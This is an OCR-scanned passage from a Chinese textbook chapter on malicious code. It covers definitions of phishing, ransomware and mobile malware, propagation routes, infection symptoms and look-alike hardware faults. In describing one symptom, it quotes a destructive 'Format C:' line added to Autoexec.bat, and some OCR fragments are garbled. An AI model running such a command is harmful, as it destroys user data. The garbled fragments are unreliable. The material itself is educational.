11. 网 络 钓鱼 

网 络 钓鱼 (Phishing 是 Phone 和 Fishing 的 组 合 词 ,与 钓鱼 的 英语 Fishing 发 音 相近 ,又 
名 钓鱼 法 或 钓鱼 式 攻击 ) 是 通过 发 送 大 量 声称 来 自 于 权威 机 构 的 欺骗 性 信息 来 引诱 信息 接 
收 者 给 出 敏感 信息 (如 用 户 名 口令、 账号 ID.ATM PIN 码 、 信 用 卡 等 ) 的 一 种 攻击 方式 。 最 
典型 的 网 络 钓鱼 攻击 是 将 收 信人 引诱 到 一 个 通过 精心 设计 与 目标 组 织 的 网 站 非常 相似 的 钩 
鱼网 站 上 ,并 获取 收 信人 在 此 网 站 上 输入 个 人 敏感 信息 ,通常 这 个 攻击 过 程 不 会 让 受害 者 警 
觉 。 网 络 钓鱼 是 “社会 工程 攻击 ”的 一 种 具体 表现 形式 。 

12. 恶意 脚本 

恶意 脚本 是 指 利用 脚本 语言 编写 的 以 危害 或 者 损害 系统 功能 .干扰 用 户 正常 使 用 为 目 
的 的 任何 脚本 程序 或 代码 片段 ,用 于 编制 恶意 脚本 的 脚本 语言 包括 Java 攻击 小 程序 (Java 
Attack Applets)、ActiveX 控件 JavaScript\VBScript\PHP、Shell 语言 等 。 恶 意 脚本 的 危 
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害 不 仅 体现 在 修改 用 户 计 算 机 的 配置 方面 :而且 还 可 以 作为 传播 蠕虫 和 木马 等 恶意 代码 的 
工具 。 
13. 垃圾 信息 
垃圾 信息 是 指 未 经 用 户 同意 向 用 户 发 送 的 ,用户 不 愿意 接收 的 信息 ,或 用 户 不 能 根据 自 
己 的 意愿 拒绝 接收 的 信息 ,主要 包含 未 经 用 户 同 意向 用 户 发 送 的 商业 类 广告 类 、 违 法 类 、 不 
良 信息 类 等 信息 。 
根据 垃圾 信息 传播 的 媒体 不 同 ,垃圾 信息 又 可 以 分 为 以 下 不 同 的 类 别 : 垃圾 短信 息 ,是 
指 在 手机 上 传播 的 垃圾 信息 ; 垃圾 邮件 ,是 指 通过 电子 邮件 传播 的 垃圾 信息 ; 即时 垃圾 信 
息 ,是 指 在 即时 消息 通信 工具 上 传播 的 垃圾 信息 ; 此 外 ,最 近 还 出 现 了 博客 垃圾 信息 、 搜 索 
引擎 垃圾 信息 等 概念 。 
14. 勒索 软件 
勒索 软件 是 黑客 用 来 动 持 用 户 资产 或 资源 并 以 此 为 条 件 向 用 户 勒 索 钱 财 的 一 种 恶意 软 
件 。 通 常会 将 用 户 系统 内 的 文档 、 邮 件 、 数 据 库 、 源 代码 、 图 片 、 压 缩 文件 等 多 种 文件 进行 某 
种 形式 的 加 密 操作 ,使 其 不 可 用 ,或 者 通过 修改 系统 配置 文件 .干扰 用 户 正 常 使 用 系统 的 方 
法 使 系统 的 可 用 性 降低 ,然后 通过 弹出 窗口 对话 框 或 生成 文本 文件 等 方式 向 用 户 发 出 勒索 
通知 ,要 求 用 户 向 指定 账户 支付 赎金 来 获得 解密 文件 的 密码 或 者 获得 恢复 系统 正常 运行 的 
方法 。 
15. 移动 终端 恶意 代码 
移动 终端 (Mobile Terminal, MT) 是 指 可 以 在 移动 中 使 用 的 计算 机 设备 ,广义 地 讲 , 包 
括 手机 、 笔 记 本 电脑 .平板 电脑 .POS 机 甚至 包括 车 载 电 脑 。 但 是 大 部 分 情况 下 是 指 手机 或 
者 具有 多 种 应 用 功能 的 智能 手机 以 及 平板 电脑 。 移 动 终 端 可 以 在 移动 中 完成 语音 ,数据 、 图 
WR 
今 为 止 ,移动 终端 恶意 代码 没有 明确 的 定义 。 在 国内 ,普遍 接受 的 手机 病毒 的 定义 
是 : ere 样 ,以 手机 为 感染 对 象 ,以 手机 网 络 和 计算 机 网 络 为 平台 ,3 
过 恶意 短信 等 形式 ,对 手机 进行 攻击 ,从 而 造成 手机 异常 的 一 种 新 型 病毒 。 以 此 为 参考 ,并 
结合 恶意 代码 的 描述 ,给 出 移动 终端 恶意 代码 的 定义 为 : 移动 终端 恶意 代码 以 移动 终端 为 
感染 对 象 ,以 移动 网 络 和 计算 机 网 络 为 平 人 台 , 通 过 无 线 或 有 线 通 信 等 方式 ,对 移动 终端 进行 
攻击 ,从 而 造成 移动 终端 异常 的 各 种 不 良 程序 代码 。 


1. 5 恶意 意 代码 的 传播 途径 


恶意 代码 的 传染 性 是 体现 其 生命 力 的 重要 手段 ,是 恶意 代码 赖 以 生存 和 繁殖 的 条 件 , 如 
果 恶 意 代 码 没有 传播 全 省 ， 则 其 破坏 性 小 ,扩散 面 窗 , 难 以 造成 大 面积 流行 。 因 此 ,熟悉 恶意 
代码 的 传播 途径 将 有 助 于 防范 恶意 代码 的 传播 。 

恶意 代码 的 传播 主要 通过 文件 复制 ,文件 传送 、 文 件 执行 等 方式 进行 ,文件 复制 与 文件 
传送 需要 传输 媒介 ， 因此 ,恶意 代码 的 扩散 与 传输 媒体 的 变化 有 着 直接 关系 。 通 过 认真 研究 
各 种 恶意 代码 的 传染 途径 ,有 的 放 矢 地 采取 有 效 措施 ,必定 能 在 对 抗 恶意 代码 的 斗争 中 占据 
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有 利 地 位 。 恶 意 代 码 的 主要 传播 途径 有 以 下 几 种 。 

1. 软盘 

在 计算 机 产生 的 最 初 几 十 年 间 ,软盘 作为 最 常用 的 交换 媒介 ,对 恶意 代码 的 传播 发 挥 了 
巨大 的 作用 。 过 去 的 计算 机 应 用 比较 简单 ,可 执行 文件 和 数据 文件 系统 都 较 小 ,许多 执行 文 
件 均 通过 软盘 相互 复制 .安装 ,恶意 代码 就 能 通过 软盘 传播 文件 型 病毒 。 在 通过 软盘 引导 操 
作 系 统 时 ,引导 区 型 病毒 就 会 在 软盘 与 硬盘 引导 区 内 互相 感染 。 因 此 ,软盘 当之无愧 地 成 了 
最 早 的 恶意 代码 传播 途径 。 不 过 软盘 已 经 成 了 历史 ,当今 的 恶意 代码 不 再 采用 软盘 作为 寄 
生物 。 

2. 光盘 

在 移动 硬盘 和 大 容量 U 盘 出 现 以 前 ,光盘 以 容量 大 著称 。 光 盘 可 以 存储 大 量 的 可 执行 
文件 ,大量 的 恶意 代码 就 有 可 能 藏身 于 光盘 。 由 于 技术 特点 ,大 多 数 光盘 都 是 只 读 式 光 盘 ， 
不 能 进行 写 操作 ,因此 光盘 上 的 恶意 代码 不 能 被 有 效 清 除 。 历 史 表 明 , 盗 版 光盘 (特别 是 盗 
版 游戏 光盘 ) 是 恶意 代码 最 主要 的 寄生 物 。 在 以 牟利 为 目的 的 非法 盗版 软件 的 制作 过 程 中 ， 
不 可 能 为 安全 防护 担负 任何 责任 ,也 决 不 会 有 真正 可 靠 的 技术 来 保障 避免 恶意 代码 的 寄宿 。 
盗版 光盘 的 泛滥 给 恶意 代码 的 传播 带 来 了 极 大 的 便利 ,甚至 有 些 存储 在 光盘 上 的 安全 防范 
工具 本 身 就 带 有 恶意 代码 ,这 就 给 本 来 “干净 ”的 计算 机 带 来 了 灾难 。 

3. 硬盘 

硬盘 含 移动 硬盘 、USB 硬盘 等 。 随 着 电子 技术 的 发 展 ,硬盘 逐渐 取代 软盘 、 光 盘 等 成 为 
数据 交换 的 主流 工具 。 携 带 恶 意 代 码 的 硬盘 在 本 地 或 移 到 其 他 地 方 使 用 甚至 维修 时 ,就 会 
使 干净 的 硬盘 传染 或 者 感染 其 他 硬盘 并 最 终 导致 恶意 代码 的 扩散 。 著 名 的 “U 盘 病 毒 ?就 
是 这 类 病毒 的 典型 代表 。 


4. Internet 


现代 通信 技术 的 巨大 进步 已 使 空间 距离 不 再 遥远 ,数据 ,文件 ,电子 邮件 可 以 方便 地 在 
各 个 网 络 节点 间 通 过 电缆 光纤 或 电话 线路 进行 传送 。 节 点 的 距离 可 以 短 至 并 排 摆 放 的 计 
算 机 ,也 可 以 长 达 上 万 千 米 ,这 就 为 恶意 代码 的 传播 提供 了 新 的 媒介 。 恶 意 代码 可 以 附着 在 
正常 文件 中 , 当 用 户 从 网 络 男 一 端 下 载 一 个 被 感染 的 程序 ,并 在 自己 的 计算 机 上 未 加 任何 防 
护 措施 的 情况 下 运行 它 时 ,恶意 代码 就 传播 开 了 。 这 种 恶意 代码 的 传染 方式 在 计算 机 网 络 
连接 很 普及 的 国家 是 很 常见 的 ,国内 计算 机 感染 一 些 “ 进 口 ” 恶 意 代码 已 不 青 是 什么 大 惊 小 
怪 的 事 了 。 在 信息 国际 化 的 同时 ,恶意 代码 也 在 国际 化 。 大 量 的 国外 恶意 代码 随 着 互联 网 
络 传人 国内 。 

Internet 的 快速 发 展 促进 了 以 有 线 网 络 为 媒介 的 各 种 服务 (FTP、WWW、BBS、 E-mail 
等 ) 的 快速 普及 。 同 时 ,这 些 服务 也 成 为 了 新 的 恶意 代码 传播 方式 。 

(1) 电子 公告 栏 (BBS) : BBS 是 由 计算 机 爱好 者 自发 组 织 的 通信 站 点 ,用 户 可 以 在 BBS 
上 进行 文件 交换 (包括 自由 软件 、 游 戏 、 自 编程 序 )。 由 于 大 多 数 BBS 网 站 没有 严格 的 安全 
管理 ,也 无 任何 限制 ,这 样 就 给 一 些 恶 意 代 码 编写 者 提供 了 传播 的 场所 。 

(2) 电子 邮件 (E-mail) : 恶意 代码 主要 以 电子 邮件 附件 的 形式 进行 传播 ,由 于 人 们 可 以 
通过 电子 邮件 发 送 任何 类 型 的 文件 .而 大 部 分 恶意 代码 的 防护 软件 在 这 方面 的 功能 还 不 是 
十 分 完善 ,使 得 电子 邮件 成 为 传播 恶意 代码 的 主要 媒介 。 
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(3) 社交 网 络 : 随 着 Web 2.0 时 代 的 到 来 ,传统 的 即时 消息 服务 如 QQ 在 线 相册 等 纷 
纷 向 社交 网 络 服 务 转 型 ,也 催生 了 微 信 、 新 浪 微 博 、Facebook、 Instagram、Twitter、 
YouTube、LinkedIn 等 更 多 形式 的 社交 网 络 服务 。 同 时 ,社交 网 络 的 作用 不 再 仅仅 是 社交 ， 
也 成 为 各 种 规模 企业 的 通用 沟通 工具 。 事 实 上 ,有 大 量 企业 依靠 社交 和 视频 网 站 来 开展 各 
种 商业 服务 ,如 客户 沟通 、 视 频 培 训 、 新 闻 和 广告 发 布 等 。 由 于 社交 网 络 的 交互 功能 和 用 户 
依赖 性 ,使 得 社交 网 络 也 迅速 成 为 恶意 代码 传播 的 一 个 重要 渠道 。 据 统计 , 仅 在 2010 年 ， 
30% 的 中 小 型 企业 都 受到 过 通过 社交 网 络 而 传播 的 恶意 软件 的 感染 。 

(4) Web 服务 : Web 网 站 在 传播 有 益 信息 的 同时 ,也 成 为 传播 不 良 信 息 的 最 重要 的 途 
径 。 亚 意 脚本 被 广泛 用 来 编制 恶意 攻击 程序 ,它们 主要 通过 Web 网 站 传播 ; 不 法 分 子 或 好 
事 之 徒 制 作 的 匿名 个 人 网 页 直接 提供 了 下 载 大 批 恶 意 代 码 活 样 本 的 便利 途径 ; 用 于 学 术 研 
究 的 样本 提供 机 构 ,专门 关于 恶意 代码 制作 、 研 究 和 讨论 的 学 术 性 质 的 电子 论文 ,期刊 .杂志 
及 相关 的 网 上 学 术 交 流 活动 等 ,都 有 可 能 成 为 国内 外 任何 想 成 为 新 的 恶意 代码 制造 者 学 习 、 
借鉴 ,次 用、 抄袭 的 目标 与 对 象 ; 散布 于 网 站 上 的 大 批 恶 意 代码 制作 工具 、 向 导 、 程 序 等 ,使 
得 无 编程 经 验 和 基础 者 制造 新 恶意 代码 成 为 可 能 。 

(5) FTP 服务 : 通过 这 个 服务 ,可 以 将 文件 放 在 世界 上 的 任何 一 台 计 算 机 上 ,或 者 从 远 
程 计算 机 复制 到 本 地 计算 机 上 。 这 在 很 大 程度 上 方便 了 学 习 和 交流 ,使 互联 网 上 的 资源 得 
到 最 大 限度 的 共享 。 FTP 能 传播 现 有 的 所 有 恶意 代码 ,所 以 在 使 用 时 就 更 要 注意 安全 

(6) 新 闻 组 (News) : 通过 这 种 服务 ,用户 可 以 与 世界 上 的 任何 人 讨论 某 个 话题 ,或 选择 
接收 感 兴趣 的 有 关 新 闻 邮 件 。 这 些 信息 中 包含 的 附件 有 可 能 使 计算 机 感染 恶意 代码 。 

5. 无 线 通信 系统 


无 线 网 络 已 经 越 来 越 普及 ,但 早期 很 少 有 无 线装 置 拥 有 安全 防范 功能 。 由 于 有 更 多 手 
机 通过 无 线 通信 系统 和 互联 网 连接 ,手机 已 成 为 恶意 代码 的 一 个 主要 攻击 目标 。 在 手机 系 
统 中 ,恶意 代码 一 旦 发 作 ,手机 就 会 出 现 故 障 或 丢失 信息 。 

恶意 代码 对 手机 的 攻击 有 3 个 层次 : 攻击 WAP 服务 器 ,使 手机 无 法 访问 服务 器 ; 攻击 
网 关 , 向 手机 用 户 发 送 大 量 垃圾 信息 ; 直接 对 手机 本 身 进 行 攻击 ,有 针对 性 地 对 其 操作 系统 
和 运行 程序 进行 攻击 ,使 手机 无 法 提供 服务 或 提供 非法 服务 。 

上 面 讨论 了 恶意 代码 的 传染 渠道 , 随 着 各 种 反 恶 意 代码 技术 的 发 展 和 人 们 对 恶意 代 
码 的 了 解 越 来 越 深 入 ,通过 对 各 条 传播 途径 的 严格 控制 ,来 自 恶 意 代 码 的 侵扰 会 越 来 
越 少 。 


1.6 感染 恶意 代码 的 症状 


恶意 代码 入 侵 计 算 机 系统 后 ,会 使 计算 机 系统 的 某 些 部 分 发 生变 化 ,引发 一 些 异 常 现 
象 ,用 户 可 以 根据 这 些 异常 现象 来 判断 是 否 有 恶意 代码 的 存在 。 恶 意 代码 的 种 类 繁多 ,入 侵 
后 引发 的 异常 现象 也 是 千奇百怪 ,因此 不 可 能 一 一 列举 。 概 括 地 说 ,可 以 从 屏幕 显示 、 系 统 
声音 、 系 统 工作 、 键 盘 、 打 印 机 ,文件 系统 等 几 个 方面 探查 异常 现象 。 
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1.6.1 恶意 代码 的 表现 现象 


根据 恶意 代码 感染 和 发 作 的 阶段 ,可 以 将 恶意 代码 的 表现 现象 分 为 三 大 类 , 即 恶 意 代码 
发 作 前 发 作 时 和 发 作 后 的 表现 现象 。 

1. 恶意 代码 发 作 前 的 表现 现象 

恶意 代码 发 作 前 是 指 从 恶意 代码 感染 计算 机 系统 ,潜伏 在 系统 内 开始 ,一 直到 激发 条 件 
满足 ,恶意 代码 发 作 之 前 的 一 个 阶段 。 在 这 个 阶段 ,恶意 代码 的 行为 主要 是 以 潜伏 、 传 播 为 
主 。 亚 意 代码 会 以 各 式 各 样 的 手法 来 隐藏 自己 ,在 不 被 发 现 的 同时 ,以 各 种 手段 进行 传播 。 
以 下 是 一 些 恶 意 代 码 发 作 前 常见 的 表现 现象 。 

(1) 陌生 人 发 来 的 电子 邮件 。 收 到 陌生 人 发 来 的 电子 邮件 ,尤其 是 带 附件 的 电子 邮件 ， 
有 可 能 携带 恶意 代码 。 这 类 恶意 代码 通常 表现 为 通过 电子 邮件 传播 的 蠕虫 。 

(2) 磁盘 空间 迅速 减少 。 一 是 没有 安装 新 的 应 用 程序 ,而 系统 可 用 的 磁盘 空间 下 降 得 
很 快 ,这 可 能 是 恶意 代码 感染 造成 的 。 二 是 经 常 浏览 网 页 、 回 收 站 中 的 文件 过 多 、 临 时 文件 
夹 下 的 文件 数量 过 多 过 大 等 情况 下 也 可 能 会 造成 可 用 的 磁盘 空间 迅速 减少 ,这 种 情况 是 
Windows 内 存 交换 文件 (pagefile. sys) 的 增多 。 三 是 Windows 系统 中 内 存 交换 文件 会 随 着 
应 用 程序 运行 的 时 间 和 进程 的 数量 增加 而 增长 ,一 般 不 会 减少 ,而 且 同时 运行 的 应 用 程序 数 
量 越 多 ,内 存 交 换文 件 就 越 大 ,这 种 情况 是 Windows 系统 的 休眠 信息 保存 文件 (hiberfil. 
sys) 的 增加 。 该 文件 的 大 小 始终 和 物理 内 存 大 小 一 致 ,系统 休眠 时 将 内 存 中 的 所 有 信息 保 
存 到 这 个 文件 中 。 

(3) 平时 正常 的 计算 机 经 常 突然 死机 。 恶 意 代码 感染 了 计算 机 系统 后 ,将 自身 驻 留 在 
系统 内 并 修改 了 核心 程序 或 数据 ,引起 系统 工作 不 稳定 ,造成 死机 现象 。 

(4) 无 法 正常 启动 操作 系统 。 关 机 后 再 启动 ,操作 系统 报告 缺少 必要 的 启动 文件 ,或 启 
动 文件 被 破坏 ,系统 无 法 启动 。 这 很 可 能 是 恶意 代码 感染 系统 文件 后 使 得 文件 结构 发 生变 
化 ,无 法 被 操作 系统 加 载 .引导 。 

(5) 计算 机 运行 速度 明显 变 慢 。 在 硬件 设备 没有 损坏 或 更 换 的 情况 下 ,本 来 运行 速度 
很 快 的 计算 机 ,运行 同样 的 应 用 程序 时 ,速度 明显 变 慢 ,而 且 重 启 后 依然 很 慢 。 这 很 可 能 是 
恶意 代码 占用 了 大 量 的 系统 资源 ,并 且 其 自身 的 运行 占用 了 大 量 的 处 理 器 时 间 ,造成 系统 资 
源 不 足 ,运行 变 慢 。 

(6) 部 分 软件 经 常 出 现 内 存 不 足 的 错误 。 某 个 以 前 能 够 正常 运行 的 程序 在 启动 的 时 候 
显示 系统 内 存 不 足 或 者 使 用 其 某 个 功能 时 显示 内 存 不 足 。 这 可 能 是 恶意 代码 驻 留 后 占用 了 
系统 中 大 量 的 内 存 空间 ,使 得 可 用 内 存 空 间 减 小 。 随 着 恶意 代码 技术 的 改进 以 及 硬件 的 发 
展 , 导 致 内 存 不 足 现象 出 现 的 恶意 代码 明显 减少 。 

(7) 以 前 能 正常 运行 的 应 用 程序 经 常 发 生死 机 或 者 非法 错误 。 在 硬件 和 操作 系统 没有 
进行 改动 的 情况 下 ,以 前 能 够 正常 运行 的 应 用 程序 产生 非法 错误 和 死机 的 情况 明显 增加 。 
这 可 能 是 由 于 恶意 代码 感染 应 用 程序 后 破坏 了 应 用 程序 本 身 的 正常 功能 ,或 者 恶意 代码 本 
身 存在 着 兼容 性 方面 的 问题 造成 的 。 

(8) 系统 文件 的 属性 发 生变 化 。 系 统 文件 的 执行 、 读 写 \ 时 间 、 日 期 \ 大 小 等 属性 发 生变 化 
是 最 明显 的 恶意 代码 感染 迹象 。 恶 意 代码 感染 宿主 程序 文件 后 ,会 将 自身 插入 其 中 ,文件 大 小 
一 般 会 有 所 增加 ,文件 的 访问 .修改 日 期 及 时 间 也 可 能 会 被 改 成 感染 时 的 时 间 。 尤 其 是 对 那些 


第 1 章 恶意 代码 概述 斑 


系统 文件 , 绝 大 多 数 情况 下 是 不 会 修改 它们 的 :除非 是 进行 系统 升级 或 打 补丁 。 对 应 用 程序 使 
用 的 数据 文件 ,文件 大 小 和 修改 日 期 \ 时 间 是 可 能 会 改变 的 ,并 不 一 定 是 恶意 代码 在 作怪 。 

(9) 系统 无 故 对 磁盘 进行 写 操作 。 用 户 没 有 要 求 进行 任何 读 、 写 磁盘 的 操作 ,操作 系统 
却 提示 读 写 磁盘 。 这 很 可 能 是 恶意 代码 自动 查找 磁盘 状态 的 时 候 引 起 的 系统 异常 。 需 要 注 
意 的 是 ,有 些 编辑 软件 会 自动 进行 存盘 操作 。 

(10) 网 络 驱动 器 卷 或 共享 目录 无 法 调用 。 对 于 有 读 权 限 的 网 络 驱动 器 卷 . 共 享 目录 等 
无 法 打开 、 浏 览 ,或 者 对 有 写 权限 的 网 络 驱动 器 卷 . 共 享 目录 等 无 法 创建 、 修 改 文 件 。 虽 然 目 
前 还 很 少 有 纯粹 地 针对 网 络 驱动 器 卷 和 共享 目录 的 恶意 代码 ,但 恶意 代码 的 某 些 行为 可 能 
会 影响 对 网 络 驱动 器 卷 和 共享 目录 的 正常 访问 。 

2. 恶意 代码 发 作 时 的 表现 现象 

恶意 代码 发 作 时 的 表现 现象 是 指 满足 恶意 代码 发 作 的 条 件 , 进 入 进行 破坏 活动 的 阶段 。 
恶意 代码 发 作 时 的 表现 大 都 各 不 相同 ,可 以 说 一 百 个 恶意 代码 发 作 有 一 百 种 花样 。 这 与 恶 
意 代码 制造 者 的 心态 、 所 采用 的 技术 手段 等 都 有 密切 的 关系 。 以 下 列举 了 一 些 恶 意 代码 发 
作 时 常见 的 表现 现象 。 

(1) 硬盘 灯 持 续 闪 烁 。 硬 盘 灯 闪烁 说 明 硬盘 正在 进行 读 写 操作 。 当 对 硬盘 有 持续 、 大 
量 的 操作 时 ,硬盘 的 灯 就 会 不 断 闪烁 。 有 的 恶意 代码 会 在 发 作 的 时 候 对 硬盘 进行 格式 化 ,或 
者 写 入 许多 垃圾 文件 ,或 反复 读 取 某 个 文件 ,致使 硬盘 上 的 数据 损坏 。 具 有 这 类 发 作 现象 的 
恶意 代码 破坏 性 非常 强 。 

(2) 无 故 播放 音乐 。 恶 作 剧 式 的 恶意 代码 ,最 著名 的 是 “ 扬 基 ”(Yangkee) 和 “浏阳 河 ” 
等 。 扬 基 发 作 时 利用 计算 机 内 置 的 扬声器 演奏 ( 扬 基 ) 音 乐 。“ 浏 阳 河 ?发 作 时 , 若 系统 时 钟 
为 9 月 9 日 则 演奏 歌曲 (浏阳 河 》, 若 当 系 统 时 钟 为 12 月 26 日 则 演奏 《东方 红 》 的 旋律 。 这 
类 恶意 代码 的 破坏 性 较 小 ,它们 只 是 在 发 作 时 播放 音乐 并 占用 处 理 器 资源 。 

(3) 不 相干 的 提示 。 宏 病毒 和 DOS 时 期 的 病毒 最 常见 的 发 作 现象 是 出 现 一 些 不 相干 
的 提示 文字 ,例如 打开 感染 了 宏 病 毒 的 Word 文档 ,如 果 满 足 发 作 条 件 , 系 统 就 会 弹出 对 话 
框 显 示 “ 这 个 世界 太 黑 上 暗 了 !1”, 并 且 要 求 用 户 输入 “ 太 正 确 了 "后 单 击 “ 确 定 ” 按 钮 。 

(4) 无 故 出 现 特定 图 像 。 此 类 恶作剧 式 的 恶意 代码 ,如 小 球 病毒 ,发 作 时 会 从 屏幕 上 方 
不 断 掉 落 小 球 图 像 。 单 纯 产生 图 像 的 恶意 代码 破坏 性 也 较 小 ,只 是 在 发 作 时 破坏 用 户 的 显 
示 界 面 ,干扰 用 户 的 正常 工作 。 

(5) 突然 出 现 算法 游戏 。 有 些 恶作剧 式 的 恶意 代码 发 作 时 执行 某 些 算法 简单 的 游戏 来 
中 断 用 户 的 工作 ,一定 要 玩 赢 了 才 让 用 户 继续 他 的 工作 。 例 如 ,曾经 流行 一 时 的 “台湾 一 号 ” 
宏 病毒 ,在 系统 日 期 为 13 日 时 发 作 ,弹出 对 话 框 , 要 求 用 户 做 算术 题 。 

(6) 改变 Windows 桌面 图 标 。 这 也 是 恶作剧 式 的 恶意 代码 发 作 时 的 典型 表现 现象 。 
把 Windows 默认 的 图 标 改 成 其 他 样式 的 图 标 ,或 者 将 其 他 应 用 程序 .快捷 方式 的 图 标 改 成 
Windows 默认 图 标 样 式 ,起 到 迷惑 用 户 的 作用 。 著 名 的 能 猫 烧 香 病 毒 就 会 把 系统 的 默认 图 
标 修改 为 烧香 的 熊猫 。 

(7) 计算 机 突然 死机 或 重启 。 有 些 恶 意 代码 在 兼容 性 上 存在 问题 ,代码 没有 严格 测试 ， 
在 发 作 时 会 造成 意 想 不 到 的 情况 ; 或 者 是 恶意 代码 在 Autoexec. bat 文件 中 添加 了 一 句 
“Format C: ”之 类 的 语句 ,需要 系统 重启 后 才能 实施 破坏 。 

(8) 自动 发 送 电 子 邮件 。 大 多 数 电 子 邮 件 恶 意 代 码 都 采用 自动 发 送 电 子 邮 件 的 方法 作 
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为 传播 的 手段 ,也 有 的 电子 邮件 恶意 代码 在 某 一 特定 时 刻 向 同一 个 邮件 服务 器 发 送 大 量 无 
用 的 信件 ,以 达到 阻塞 该 邮件 服务 器 正常 服务 功能 的 目的 。 利 用 邮件 引擎 传播 的 蠕虫 具有 
这 种 现象 。 

(9) 鼠标 指针 无 故 移动 。 没 有 对 计算 机 进行 任何 操作 ,也 没有 运行 任何 演示 程序 .屏幕 
保护 程序 等 ,而 屏幕 上 的 鼠标 指针 自己 在 移动 ,好 像 应 用 程序 自己 在 运行 ,被 遥控 似 的 。 有 
些 特 洛 伊 木 马 在 远程 控制 时 会 产生 这 种 现象 。 

需要 指出 的 是 ,上 述 现象 有 些 是 恶意 代码 发 作 的 明显 现象 ,如 出 现 一 些 不 相干 的 话 、 播 
放 音 乐 或 者 显示 特定 的 图 像 等 。 有 些 现象 则 很 难 直 接 判定 是 否 为 恶意 代码 在 作怪 ,如 硬盘 
灯 不 断 闪烁 ,在 同时 运行 多 个 占用 内 存 较 大 的 应 用 程序 ,而 计算 机 本 身 性 能 又 相对 较 弱 的 情 
况 下 ,启动 和 切换 应 用 程序 的 时 候 也 会 使 硬盘 不 停 地 工作 ,出 现 硬 盘 灯 不 断 闪 烁 的 现象 。 

3. 恶意 代码 发 作 后 的 表现 现象 

通常 情况 下 ,恶意 代码 发 作 会 给 计算 机 系统 带 来 破坏 性 后 果 。 大 多 数 恶 意 代 码 都 属于 
恶性 的 。 恶 性 的 恶意 代码 发 作 后 往往 会 带 来 很 大 的 损失 ,以 下 列举 了 一 些 恶 性 的 恶意 代码 
发 作 后 所 造成 的 后 果 。 

(1) 无 法 启动 系统 。 恶 意 代码 破坏 了 硬盘 的 引导 扇 区 后 ,就 无 法 从 硬盘 启动 计算 机 系 
统 了 。 有 些 恶 意 代码 修改 了 硬盘 的 关键 内 容 ( 如 文件 分 配 表 、 根 目录 区 等 ) ,使 得 原先 保存 在 
硬盘 上 的 数据 几乎 完全 丢失 。 

(2) 系统 文件 丢失 或 被 破坏 。 通 常 系统 文件 是 不 会 被 删除 或 修改 的 ,除非 计算 机 操作 
系统 进行 了 升级 。 但 是 某 些 恶意 代码 发 作 时 删除 了 系统 文件 ,或 者 破坏 了 系统 文件 ,使 得 以 
后 无 法 正常 启动 计算 机 系统 。 

(3) 部 分 BIOS 程序 混乱 。 类 似 于 CIH 病毒 发 作 后 的 现象 ,系统 主板 上 的 BIOS 被 恶 
意 代 码 改写 .破坏 , 使 得 系统 主板 无 法 正常 工作 ,从 而 使 计算 机 系统 的 部 分 元 器 件 报废 。 

(4) 部 分 文档 丢失 或 被 破坏 。 类 似 于 系统 文件 的 丢失 或 被 破坏 ,有 些 恶 意 代码 在 发 作 
时 会 删除 或 破坏 硬盘 上 的 文档 ,造成 数据 丢失 。 

(5) 部 分 文档 自动 加 密 。 有 些 恶意 代码 利用 加 密 算 法 ,对 被 感染 的 文件 进行 加 密 ,并 将 
加 密 密 钥 保存 在 恶意 代码 程序 体内 或 其 他 隐蔽 的 地 方 ,如 果 内 存 中 驻 留 了 这 种 恶意 代码 , 那 
么 在 系统 访问 被 感染 的 文件 时 它 自 动 将 文件 解密 ,使 得 用 户 察觉 不 到 文件 曾 被 加 密 过 。 一 
且 这 种 恶意 代码 被 清除 ,那么 被 加 密 的 文件 就 很 难 被 恢复 了 。 

(6) 目录 结构 发 生 混乱 。 目 录 结 构 发 生 混乱 有 两 种 情况 。 一 种 是 目录 结构 确实 受到 破 
坏 , 目 录 扇 区 作为 普通 扇 区 使 用 而 被 填写 一 些 无 意义 的 数据 ,再 也 无 法 恢复 。 另 一 种 情况 是 
真正 的 目录 扇 区 被 转移 到 硬盘 的 其 他 扇 区 中 ,只 要 内 存 中 存在 该 恶意 代码 , 它 就 能 够 将 正确 
的 目录 扇 区 读 出 ,并 在 应 用 程序 需要 访问 该 目录 的 时 候 提 供 正确 的 目录 项 ,使 得 从 表面 上 看 
与 正常 情况 没有 两 样 。 

(7) 网 络 无 法 提供 正常 服务 。 有 些 亚 意 代码 会 利用 网 络 协议 的 弱点 进行 破坏 ,使 网 络 
无 法 正常 使 用 。 这 类 恶意 代码 的 典型 代表 是 ARP 型 的 恶意 代码 。ARP 恶意 代码 会 修改 本 
地 计算 机 的 MAC-IP 对 照 表 ,使 得 数据 链 路 层 的 通信 无 法 正常 进行 。 

(8) 浏览 器 自动 访问 非法 网 站 。 当 用 户 的 计算 机 被 恶意 脚本 破坏 后 ,恶意 脚本 往往 会 
修改 浏览 器 的 配置 。 这 类 恶意 代码 的 典型 代表 是 “万 花 简 ” 病 毒 ,该 病毒 会 让 用 户 的 计算 机 
自动 链接 某 些 色 情 网 站 。 
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1.6.2 与 恶意 代码 现象 类 似 的 硬件 故障 


硬件 的 故障 范围 不 太 广 泛 , 也 很 容易 被 确认 。 在 识别 和 处 理 计算 机 的 异常 现象 时 ,硬件 
故障 很 容易 被 忽略 ,但 只 有 先 排除 硬件 故障 , 才 是 解决 问题 的 根本 。 

1. 硬件 配置 问题 

这 种 故障 常 发 生 在 兼容 机 上 。 由 于 配件 的 不 完全 兼容 ,导致 一 些 软件 不 能 正常 运行 。 
因此 ,用 户 在 组 装 计算 机 时 应 首先 考虑 配件 的 兼容 性 。 

2. 电源 电压 不 稳定 

车 计算 机 所 使 用 的 电源 电压 不 稳定 ,容易 导致 用 户 文件 在 磁盘 读 写 时 出 现 丢 失 或 被 破 
坏 的 现象 ,严重 时 将 会 引起 系统 自 启动 。 如 果 用 户 所 用 的 电源 电压 经 常 出 现 不 稳定 的 情况 ， 
建议 使 用 电源 稳 压 器 或 不 间断 电源 (UPS) 。 

3. 接触 不 良 

计算 机 插件 和 插 模 之 间接 触 不 良 , 会 使 某 些 设备 出 现时 好 时 坏 的 现象 。 例 如 ,显示 器 的 
数据 线 与 主机 接触 不 良 时 可 能 会 使 显示 器 显示 不 稳定 ,磁盘 线 与 多 功能 卡 接触 不 良 时 会 导 
致 磁盘 读 写 时 好 时 坏 ,打印机 电缆 与 主机 接触 不 良 时 会 造成 打印 机 不 工作 或 工作 现象 不 正 
常 ,鼠标 线 与 串 行 接口 接触 不 良 时 会 出 现 鼠 标 指 针 时 动 时 不 动 的 故障 等 。 

4. 驱动 器 故障 

